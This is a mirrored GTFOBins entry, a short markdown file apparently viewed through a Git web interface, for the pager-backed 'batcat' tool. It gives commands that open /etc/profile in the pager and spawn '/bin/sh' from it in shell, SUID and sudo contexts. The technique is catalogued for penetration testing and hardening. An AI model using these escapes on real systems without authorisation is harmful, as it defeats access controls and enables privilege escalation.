mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
17 lines
488 B
Markdown
17 lines
488 B
Markdown
|
---
|
||
|
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. `--paging always` can be omitted provided that the output doesn't fit the screen.
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
batcat --paging always /etc/profile
|
||
|
!/bin/sh
|
||
|
suid-limited:
|
||
|
- code: |
|
||
|
./batcat --paging always /etc/profile
|
||
|
!/bin/sh
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo batcat --paging always /etc/profile
|
||
|
!/bin/sh
|
||
|
---
|